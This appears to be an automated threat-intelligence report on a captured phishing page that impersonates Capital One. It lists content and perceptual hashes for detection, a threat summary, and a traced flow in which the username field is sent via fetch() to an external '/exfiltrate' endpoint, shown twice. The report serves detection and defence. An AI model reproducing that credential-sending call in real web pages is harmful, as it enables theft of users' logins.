Detailed analysis of captured phishing page
Used to detect similar phishing pages based on HTML content
| Algorithm | Hash Value |
|---|---|
|
CONTENT
TLSH
|
T165E31E72B5012D7F6787BE96E9267F01F2A18235F40B1794FBA5090A4FC2FF59226324 |
|
CONTENT
ssdeep
|
3072:/lFvGzGVoFuzasIEC6IX75RcOGc0dzkkLpMY9lKkNdjc58ktu4hwZ2cj+hd2jEZ1:/lFvGzGVoFuzasIEC6IX75RcOGc0dzkJ |
Used to detect visually similar phishing pages based on screenshots
| Algorithm | Hash Value |
|---|---|
|
VISUAL
pHash
|
cd56b34b2caa5325 |
|
VISUAL
aHash
|
fff8f8f0f0f8ffff |
|
VISUAL
dHash
|
2c50e02322d12a2b |
|
VISUAL
wHash
|
fff830101080dbdf |
|
VISUAL
colorHash
|
060010100c0 |
|
VISUAL
cropResistant
|
2c50e02322d12a2b,f1c77d5f7d477f7c,030d719f9f4e777f,010d619585614f7e,0109d52d65456561,e1071dc919599992 |
โข Threat: Phishing
โข Target: Capital One customers
โข Method: Impersonation via free hosting
โข Exfil: Potentially forms
โข Indicators: Free hosting, brand logo, obfuscated JavaScript, forms.
โข Risk: HIGH
The attacker aims to steal user credentials by creating a fake Capital One website.
User fills <input name='username'> โ trackFormSubmission() โ fetch('https://d26hpdecvhwn5s.cloudfront.net/exfiltrate') โ Data sent to external endpoint
User fills <input name='username'> โ trackFormSubmission() โ fetch('https://d26hpdecvhwn5s.cloudfront.net/exfiltrate') โ Data sent to external endpoint
sp.jstrackFormSubmissiontrackLinkClicksendDataPages with identical visual appearance (based on perceptual hash)
Found 10 other scans for this domain